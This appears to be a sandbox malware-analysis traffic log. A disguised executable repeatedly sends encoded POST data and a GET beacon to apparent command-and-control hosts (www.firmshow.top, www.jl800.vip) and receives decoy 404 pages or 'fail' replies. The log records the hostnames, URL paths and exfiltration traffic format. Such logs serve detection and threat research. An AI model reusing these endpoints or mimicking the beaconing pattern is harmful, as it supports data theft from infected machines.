                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 69 74 65 22 3e 0a 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 6b 65 74 63 68 22 3e [TRUNCATED]
                                                          Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel="stylesheet" href="./style.css"></head><body>... partial:index.partial.html --><div class="site"><div class="sketch"><div class="bee-sketch red"></div><div class="bee-sketch blue"></div></div><h1>404:<small>Players Not Found</small></h1></div>... partial --> </body></html>


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          6192.168.2.649728203.161.43.22880280C:\Program Files (x86)\riMAYNELmpJOEonvhslpwxHTizECOGYLjPVpHdyNUuwSormSvetDoHVjvEgC\YcTurzUREEPNDwUlDlxzRT.exe
                                                          TimestampBytes transferredDirectionData
                                                          Jul 2, 2024 14:03:34.684638023 CEST770OUTPOST /02nb/ HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                          Accept-Language: en-US,en;q=0.9
                                                          Accept-Encoding: gzip, deflate, br
                                                          Cache-Control: max-age=0
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Connection: close
                                                          Content-Length: 236
                                                          Host: www.firmshow.top
                                                          Origin: http://www.firmshow.top
                                                          Referer: http://www.firmshow.top/02nb/
                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
                                                          Data Raw: 47 42 62 6c 6a 54 4f 3d 39 43 6b 55 33 6b 66 74 69 34 48 32 70 41 65 38 63 48 4a 4e 2f 6a 46 38 4a 70 53 35 62 55 2b 50 56 39 42 6f 33 76 4a 71 51 75 74 61 44 61 78 72 62 47 68 65 6c 75 64 4e 38 56 6a 79 42 47 32 73 74 43 6f 70 61 64 68 75 57 39 30 30 63 57 79 33 44 66 6e 38 66 2b 77 6c 55 73 4f 76 37 2f 4d 30 50 69 45 76 53 65 72 5a 55 67 51 58 32 62 6a 41 6e 68 44 32 42 31 39 41 4c 5a 53 75 4c 47 70 48 31 38 41 6c 4e 77 55 76 43 43 54 77 63 5a 50 38 6c 69 58 48 39 53 6e 34 53 42 45 72 48 6b 77 49 73 49 54 4f 6d 57 31 34 78 76 4e 58 74 79 33 6d 4c 6a 61 51 4a 61 4d 41 64 71 62 59 55 31 6a 5a 2f 57 7a 65 42 6a 6e 34 2f 38 51 39 77 45 2f 4b 44 75 42 58 72 68 71 74 7a 33 2b 55 42 58 32 44 51 67 3d 3d
                                                          Data Ascii: GBbljTO=9CkU3kfti4H2pAe8cHJN/jF8JpS5bU+PV9Bo3vJqQutaDaxrbGheludN8VjyBG2stCopadhuW900cWy3Dfn8f+wlUsOv7/M0PiEvSerZUgQX2bjAnhD2B19ALZSuLGpH18AlNwUvCCTwcZP8liXH9Sn4SBErHkwIsITOmW14xvNXty3mLjaQJaMAdqbYU1jZ/WzeBjn4/8Q9wE/KDuBXrhqtz3+UBX2DQg==
                                                          Jul 2, 2024 14:03:35.380281925 CEST658INHTTP/1.1 404 Not Found
                                                          Date: Tue, 02 Jul 2024 12:03:35 GMT
                                                          Server: Apache
                                                          Content-Length: 514
                                                          Connection: close
                                                          Content-Type: text/html
                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 69 74 65 22 3e 0a 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 6b 65 74 63 68 22 3e [TRUNCATED]
                                                          Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel="stylesheet" href="./style.css"></head><body>... partial:index.partial.html --><div class="site"><div class="sketch"><div class="bee-sketch red"></div><div class="bee-sketch blue"></div></div><h1>404:<small>Players Not Found</small></h1></div>... partial --> </body></html>


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          7192.168.2.649729203.161.43.22880280C:\Program Files (x86)\riMAYNELmpJOEonvhslpwxHTizECOGYLjPVpHdyNUuwSormSvetDoHVjvEgC\YcTurzUREEPNDwUlDlxzRT.exe
                                                          TimestampBytes transferredDirectionData
                                                          Jul 2, 2024 14:03:37.215337992 CEST1783OUTPOST /02nb/ HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                          Accept-Language: en-US,en;q=0.9
                                                          Accept-Encoding: gzip, deflate, br
                                                          Cache-Control: max-age=0
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Connection: close
                                                          Content-Length: 1248
                                                          Host: www.firmshow.top
                                                          Origin: http://www.firmshow.top
                                                          Referer: http://www.firmshow.top/02nb/
                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
                                                          Data Raw: 47 42 62 6c 6a 54 4f 3d 39 43 6b 55 33 6b 66 74 69 34 48 32 70 41 65 38 63 48 4a 4e 2f 6a 46 38 4a 70 53 35 62 55 2b 50 56 39 42 6f 33 76 4a 71 51 74 4e 61 44 70 70 72 61 6e 68 65 6b 75 64 4e 78 31 6a 7a 42 47 33 32 74 44 4d 74 61 64 74 59 57 34 34 30 54 54 2b 33 47 75 6e 38 4b 75 77 6c 57 73 4f 69 31 66 4d 62 50 69 55 7a 53 65 37 5a 55 67 51 58 32 5a 72 41 75 56 66 32 4e 56 38 79 4d 5a 53 55 61 32 70 76 31 38 35 61 4e 77 52 61 44 79 7a 77 46 35 66 38 6e 55 37 48 78 53 6e 36 52 42 46 6f 48 6b 4d 4c 73 49 4f 33 6d 57 42 43 78 6f 39 58 75 47 65 39 59 52 4f 6b 51 5a 41 53 43 6f 6a 54 55 51 7a 64 2f 48 66 2b 41 31 58 31 67 4e 51 4e 70 43 33 76 50 2b 41 73 73 52 4f 68 2f 68 32 47 53 6d 48 38 55 77 74 34 4e 7a 55 67 39 35 34 48 6f 4e 6b 2f 50 50 6e 4d 50 48 65 62 6f 55 69 72 38 44 38 52 4b 45 4e 35 77 7a 69 76 72 35 34 53 30 67 76 48 5a 2f 34 36 67 79 52 53 33 6d 31 33 54 4f 75 2f 6c 5a 70 74 47 37 51 52 45 46 33 35 31 37 6d 38 65 63 32 63 53 64 50 39 53 6f 53 77 57 4c 73 59 56 5a 55 62 31 4a 38 6d 42 6b [TRUNCATED]
                                                          Data Ascii: GBbljTO=9CkU3kfti4H2pAe8cHJN/jF8JpS5bU+PV9Bo3vJqQtNaDppranhekudNx1jzBG32tDMtadtYW440TT+3Gun8KuwlWsOi1fMbPiUzSe7ZUgQX2ZrAuVf2NV8yMZSUa2pv185aNwRaDyzwF5f8nU7HxSn6RBFoHkMLsIO3mWBCxo9XuGe9YROkQZASCojTUQzd/Hf+A1X1gNQNpC3vP+AssROh/h2GSmH8Uwt4NzUg954HoNk/PPnMPHeboUir8D8RKEN5wzivr54S0gvHZ/46gyRS3m13TOu/lZptG7QREF3517m8ec2cSdP9SoSwWLsYVZUb1J8mBkkQZxvWQAw7DLHjM/j1q7WAC7Qo4mmhs7ZyzANFnbPEBiUawb75/8VjZgVaQAlZF2pDLJQI8ZLGNn1b5gzrCa4UyC39+65L/MG3tEMK/l8B9On4mlt7H7LvipeWUKee4l6LWVVtGsFFRcJVFQAAVok0sEWq50fjK16NNsV/O3Fw1IKbGtNli/ueX6j/OEJF34N8uMID9NktPOVXjeO9/vHgFj96x3bqBPFxOBBElUhz/d/vcFbFrLvbDzqEM77FtpeOmYAH/ogMQIN0Ltq82rqRHW8KnHxsZNyFrT2/3O6GjDFgytS2XY4tBcLh3xz/nBq74FZJMGaNTaWNUEhGIbvrqeJLnZt3xFC9FGSZP3paXaDtm/9NfE684TSE9XLSkExvaqWXgyrYxh7a49EyNKsVp9Y9sW6RgCYUAdPyd8aZI34xrrogbkFSyqUH4HivSkOPL2Atk2LFJxYsHVAVUOnFKNWTPh+6KRhzx3pNg0Cn7VgRGwf7RJrFOuAXWr35MWp9UWqfKhopeBUa4SPpytbB9tjK1vEhfdKoru9U+MueD4cy80KkoJJOM5VnFN2ElvnZ7Rv2BnRLZBuEnZIyuW4rYVMrvktEl1KLQXxdeIb5VjErmis4fUcF85t7uuHr43UMUqud1kB2QMKDtTKPBgpSWTJsJVtmg8rP [TRUNCATED]
                                                          Jul 2, 2024 14:03:37.883249998 CEST658INHTTP/1.1 404 Not Found
                                                          Date: Tue, 02 Jul 2024 12:03:37 GMT
                                                          Server: Apache
                                                          Content-Length: 514
                                                          Connection: close
                                                          Content-Type: text/html
                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 69 74 65 22 3e 0a 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 6b 65 74 63 68 22 3e [TRUNCATED]
                                                          Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel="stylesheet" href="./style.css"></head><body>... partial:index.partial.html --><div class="site"><div class="sketch"><div class="bee-sketch red"></div><div class="bee-sketch blue"></div></div><h1>404:<small>Players Not Found</small></h1></div>... partial --> </body></html>


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          8192.168.2.649730203.161.43.22880280C:\Program Files (x86)\riMAYNELmpJOEonvhslpwxHTizECOGYLjPVpHdyNUuwSormSvetDoHVjvEgC\YcTurzUREEPNDwUlDlxzRT.exe
                                                          TimestampBytes transferredDirectionData
                                                          Jul 2, 2024 14:03:39.747488022 CEST482OUTGET /02nb/?GBbljTO=wAM00RPxm4SI4CXmbVVIy3I1PpnrRkiLCY5B6OI1JPNyCoxACldRit5a2XiaNEn9mU81Z8Y/J9c7Sme1Jv71eMMWXuG1yY1QMiMjNPzXdj8brJHDqS7NAGlwA4SgIkhB8sM3B24=&mB=rL4lP HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                          Accept-Language: en-US,en;q=0.9
                                                          Connection: close
                                                          Host: www.firmshow.top
                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
                                                          Jul 2, 2024 14:03:40.370306969 CEST673INHTTP/1.1 404 Not Found
                                                          Date: Tue, 02 Jul 2024 12:03:40 GMT
                                                          Server: Apache
                                                          Content-Length: 514
                                                          Connection: close
                                                          Content-Type: text/html; charset=utf-8
                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 69 74 65 22 3e 0a 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 6b 65 74 63 68 22 3e [TRUNCATED]
                                                          Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel="stylesheet" href="./style.css"></head><body>... partial:index.partial.html --><div class="site"><div class="sketch"><div class="bee-sketch red"></div><div class="bee-sketch blue"></div></div><h1>404:<small>Players Not Found</small></h1></div>... partial --> </body></html>


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          9192.168.2.64973138.47.158.21580280C:\Program Files (x86)\riMAYNELmpJOEonvhslpwxHTizECOGYLjPVpHdyNUuwSormSvetDoHVjvEgC\YcTurzUREEPNDwUlDlxzRT.exe
                                                          TimestampBytes transferredDirectionData
                                                          Jul 2, 2024 14:03:46.202683926 CEST737OUTPOST /g67v/ HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                          Accept-Language: en-US,en;q=0.9
                                                          Accept-Encoding: gzip, deflate, br
                                                          Cache-Control: max-age=0
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Connection: close
                                                          Content-Length: 212
                                                          Host: www.jl800.vip
                                                          Origin: http://www.jl800.vip
                                                          Referer: http://www.jl800.vip/g67v/
                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
                                                          Data Raw: 47 42 62 6c 6a 54 4f 3d 52 2b 6b 62 74 47 42 48 71 63 4a 72 2b 54 77 71 6b 67 76 77 4a 30 53 74 6f 55 4d 7a 2f 33 47 59 74 2f 4e 59 56 66 57 35 45 6a 37 65 52 44 63 39 46 4c 2f 6f 4a 71 56 65 49 41 6e 65 30 6c 76 32 43 6b 38 44 6e 45 74 2f 50 69 37 57 6d 79 36 67 69 2f 50 4d 61 49 51 37 6a 41 67 76 2f 31 34 5a 39 4f 64 54 77 50 63 41 6b 55 69 47 65 38 44 37 2f 36 5a 42 43 56 78 57 77 44 67 35 73 36 6a 5a 4a 53 4d 78 33 46 52 42 78 4e 4f 4d 63 4d 74 54 55 74 7a 6e 55 55 4e 69 49 33 49 5a 6d 76 34 50 74 54 77 66 32 79 71 32 65 78 48 6f 53 2b 57 69 37 43 4a 6a 50 58 52 2f 31 2b 66 34 64 42 74 2f 43 6f 46 64 55 63 69 4b 61 54 6e 61
                                                          Data Ascii: GBbljTO=R+kbtGBHqcJr+TwqkgvwJ0StoUMz/3GYt/NYVfW5Ej7eRDc9FL/oJqVeIAne0lv2Ck8DnEt/Pi7Wmy6gi/PMaIQ7jAgv/14Z9OdTwPcAkUiGe8D7/6ZBCVxWwDg5s6jZJSMx3FRBxNOMcMtTUtznUUNiI3IZmv4PtTwf2yq2exHoS+Wi7CJjPXR/1+f4dBt/CoFdUciKaTna
                                                          Jul 2, 2024 14:03:47.009485960 CEST778INHTTP/1.1 200 OK
                                                          Date: Tue, 02 Jul 2024 12:03:46 GMT
                                                          Content-Type: application/json;charset=utf8;
                                                          Content-Length: 62
                                                          Connection: close
                                                          Set-Cookie: http_waf_cookie=1b05255d-27fe-4447881929ccafd91ea432e9c2bb42f5bca3; Expires=1719929026; Path=/; HttpOnly
                                                          Set-Cookie: acw_tc=ac11000117199218268692356e01950a25397ec8fe62da97f66a8b133c9019;path=/;HttpOnly;Max-Age=1800
                                                          jckl: ExjRz0vWW3MUIJzauHFEupm7E/3gUrE5am7cX2LSfrNBkRjx+COrJ5W1+ccHQCqhIBU+esdygAcYE2qXizwj8g==
                                                          X-Content-Type-Options: nosniff
                                                          X-XSS-Protection: 1
                                                          Strict-Transport-Security: max-age=63072000; includeSubdomains; preload
                                                          Via: 1.1 google
                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                          X-Request-Id: 1e8799fb41b30dab797806891377face
                                                          Data Raw: 7b 22 73 74 61 74 75 73 22 3a 20 22 36 30 30 31 22 2c 22 6d 73 67 22 3a 20 22 66 61 69 6c 22 2c 22 72 65 73 75 6c 74 22 3a 22 e8 8e b7 e5 8f 96 e4 bf a1 e6 81 af e5 a4 b1 e8 b4 a5 22 7d
                                                          Data Ascii: {"status": "6001","msg": "fail","result":""}


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          10192.168.2.64973238.47.158.21580280C:\Program Files (x86)\riMAYNELmpJOEonvhslpwxHTizECOGYLjPVpHdyNUuwSormSvetDoHVjvEgC\YcTurzUREEPNDwUlDlxzRT.exe
                                                          TimestampBytes transferredDirectionData
                                                          Jul 2, 2024 14:03:48.731627941 CEST761OUTPOST /g67v/ HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                          Accept-Language: en-US,en;q=0.9
                                                          Accept-Encoding: gzip, deflate, br
                                                          Cache-Control: max-age=0
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Connection: close
                                                          Content-Length: 236
                                                          Host: www.jl800.vip
                                                          Origin: http://www.jl800.vip
                                                          Referer: http://www.jl800.vip/g67v/
                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
                                                          Data Raw: 47 42 62 6c 6a 54 4f 3d 52 2b 6b 62 74 47 42 48 71 63 4a 72 2f 33 4d 71 68 42 76 77 49 55 53 75 6a 30 4d 7a 31 58 47 45 74 2f 42 59 56 62 6d 70 45 56 4c 65 52 69 4d 39 45 50 72 6f 4f 71 56 65 61 67 6e 66 35 46 76 39 43 6b 77 4c 6e 47 70 2f 50 6b 58 57 6d 33 47 67 69 4d 33 4e 56 34 51 35 36 51 67 74 79 56 34 5a 39 4f 64 54 77 50 49 6d 6b 55 36 47 66 4e 54 37 2b 59 78 43 42 56 78 56 33 44 67 35 37 4b 6a 56 4a 53 4e 65 33 46 68 37 78 4f 6d 4d 63 49 70 54 54 38 7a 6b 50 6b 4e 37 58 6e 49 4b 6d 71 46 2b 68 53 45 61 2f 52 48 54 50 52 62 64 54 49 58 34 6e 78 4a 41 64 48 78 39 31 38 48 4b 64 68 74 56 41 6f 39 64 47 4c 75 74 56 6e 43 35 42 62 4b 56 6d 38 41 4c 42 68 34 34 6d 4c 7a 30 65 43 44 73 56 51 3d 3d
                                                          Data Ascii: GBbljTO=R+kbtGBHqcJr/3MqhBvwIUSuj0Mz1XGEt/BYVbmpEVLeRiM9EProOqVeagnf5Fv9CkwLnGp/PkXWm3GgiM3NV4Q56QgtyV4Z9OdTwPImkU6GfNT7+YxCBVxV3Dg57KjVJSNe3Fh7xOmMcIpTT8zkPkN7XnIKmqF+hSEa/RHTPRbdTIX4nxJAdHx918HKdhtVAo9dGLutVnC5BbKVm8ALBh44mLz0eCDsVQ==
                                                          Jul 2, 2024 14:03:49.550014973 CEST778INHTTP/1.1 200 OK
                                                          Date: Tue, 02 Jul 2024 12:03:49 GMT
                                                          Content-Type: application/json;charset=utf8;
                                                          Content-Length: 62
                                                          Connection: close
                                                          Set-Cookie: http_waf_cookie=dff3a11d-3df4-40a4006acabde96a2db8741ec1c8444f3dd0; Expires=1719929029; Path=/; HttpOnly
                                                          Set-Cookie: acw_tc=ac11000117199218293966935e009b8945be4087883cee6c2ae4ede6631cd8;path=/;HttpOnly;Max-Age=1800
                                                          jckl: kpPsYwEN3PnFDN6vJqtT4CHpIEACpwSkhVKj9+V/M/t3v9k0GCv/wtf5Pa51Kg6u0CR/q5D+CCjLy7mWkkKsyg==
                                                          X-Content-Type-Options: nosniff
                                                          X-XSS-Protection: 1
                                                          Strict-Transport-Security: max-age=63072000; includeSubdomains; preload
                                                          Via: 1.1 google
                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                          X-Request-Id: 9dcfd32e20158cd532d7327bafff7cac
                                                          Data Raw: 7b 22 73 74 61 74 75 73 22 3a 20 22 36 30 30 31 22 2c 22 6d 73 67 22 3a 20 22 66 61 69 6c 22 2c 22 72 65 73 75 6c 74 22 3a 22 e8 8e b7 e5 8f 96 e4 bf a1 e6 81 af e5 a4 b1 e8 b4 a5 22 7d
                                                          Data Ascii: {"status": "6001","msg": "fail","result":""}


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          11192.168.2.64973338.47.158.21580280C:\Program Files (x86)\riMAYNELmpJOEonvhslpwxHTizECOGYLjPVpHdyNUuwSormSvetDoHVjvEgC\YcTurzUREEPNDwUlDlxzRT.exe
                                                          TimestampBytes transferredDirectionData
                                                          Jul 2, 2024 14:03:51.263981104 CEST1774OUTPOST /g67v/ HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                          Accept-Language: en-US,en;q=0.9
                                                          Accept-Encoding: gzip, deflate, br
                                                          Cache-Control: max-age=0
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Connection: close
                                                          Content-Length: 1248
                                                          Host: www.jl800.vip
                                                          Origin: http://www.jl800.vip
                                                          Referer: http://www.jl800.vip/g67v/
                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
                                                          Data Raw: 47 42 62 6c 6a 54 4f 3d 52 2b 6b 62 74 47 42 48 71 63 4a 72 2f 33 4d 71 68 42 76 77 49 55 53 75 6a 30 4d 7a 31 58 47 45 74 2f 42 59 56 62 6d 70 45 57 72 65 52 56 4d 39 46 75 72 6f 50 71 56 65 5a 67 6e 61 35 46 76 67 43 6b 59 31 6e 47 31 4a 50 68 4c 57 6e 52 53 67 6b 39 33 4e 43 6f 51 35 79 77 67 6f 2f 31 34 32 39 4f 4e 70 77 50 59 6d 6b 55 36 47 66 4f 37 37 2b 4b 5a 43 48 56 78 57 77 44 67 39 73 36 6a 35 4a 53 6b 70 33 45 56 72 78 2b 47 4d 64 73 4e 54 56 4f 4c 6b 44 6b 4e 75 55 6e 4a 58 6d 71 42 6c 68 53 70 6a 2f 51 79 32 50 51 6a 64 66 73 6d 45 34 43 4a 38 47 42 74 36 6b 63 4c 71 61 48 5a 63 46 65 31 2f 41 61 71 59 63 6a 65 35 4b 38 47 73 73 2b 31 37 4a 6e 4e 57 74 76 6a 6c 64 7a 36 36 42 36 47 73 4a 6f 49 62 4f 53 64 65 4c 71 64 75 42 52 37 78 4e 67 36 2f 33 32 2b 79 63 69 45 4f 6c 52 45 7a 6a 4e 56 43 77 67 72 74 61 31 31 6f 79 5a 5a 56 6c 54 6b 57 67 61 35 2f 79 64 48 48 4b 4b 44 6e 54 43 2b 57 42 5a 38 6a 39 74 38 47 6f 61 44 4e 4a 6b 58 7a 46 44 63 45 55 4c 6e 55 69 48 35 6f 6e 67 58 55 54 5a [TRUNCATED]
                                                          Data Ascii: GBbljTO=R+kbtGBHqcJr/3MqhBvwIUSuj0Mz1XGEt/BYVbmpEWreRVM9FuroPqVeZgna5FvgCkY1nG1JPhLWnRSgk93NCoQ5ywgo/1429ONpwPYmkU6GfO77+KZCHVxWwDg9s6j5JSkp3EVrx+GMdsNTVOLkDkNuUnJXmqBlhSpj/Qy2PQjdfsmE4CJ8GBt6kcLqaHZcFe1/AaqYcje5K8Gss+17JnNWtvjldz66B6GsJoIbOSdeLqduBR7xNg6/32+yciEOlREzjNVCwgrta11oyZZVlTkWga5/ydHHKKDnTC+WBZ8j9t8GoaDNJkXzFDcEULnUiH5ongXUTZKQ6bXUBe2ITjli/csyTyNoq1hWFQYEudSgVsEdIUe2ZPZxE12tm6b9P0gb2NVpNhjU0k/oLS1dVeB3Kv/aFCzJ5vSVrCk7olffme6xnuKEfrZYk8sjwcUw8ILSWp7H7GisTwbCDm4byLadt33RdUl11T5xkatKSq01N9KG3f4/T2gAWG3Cet7zUpDipON1iNDZo7IGW9qavCrZFbqMGP7QuxIYJdMKSCGH1hc5o3tYkTy9D3VZFTTWtTwKwAyCM6fcIei3yLUqfC09l4gpqv7RTlu3HMQe3wTrv7cA0CDkklvW65ywFBZ7gZbVRDaXJ3hUMp+ha3mHC0VOs+r5PDd4Bm8GoG7kG5RWNkwhmdvzI3VUh3dfoLKU92mnFanxF8ZGqZxHH1LtuZoDgvGZA/Lo3jb1EEcS/YN65o9cbP/WPFxfKBUqJLVluLuWBE27Gym43WRcZ8J+E8rXjkyilVAPjnyOE9i7H62rIc8XE15xGxaJiTuphLe8IMcCeRIHy5OY66bmOJCisBTCisCUJRSJc7HkUr4iB1uqjJAFNLpPraAbQlAKmHIpXNTYI1san0Z9567qKZPhvleNj1SWUhXzDOK9+P51+vZAQzyv5tjWrj6MDz/co3aUKp/WbSZl9lsU2bG7iyzdLE7nj0gCf0/7ljC7M3Zrz00F [TRUNCATED]


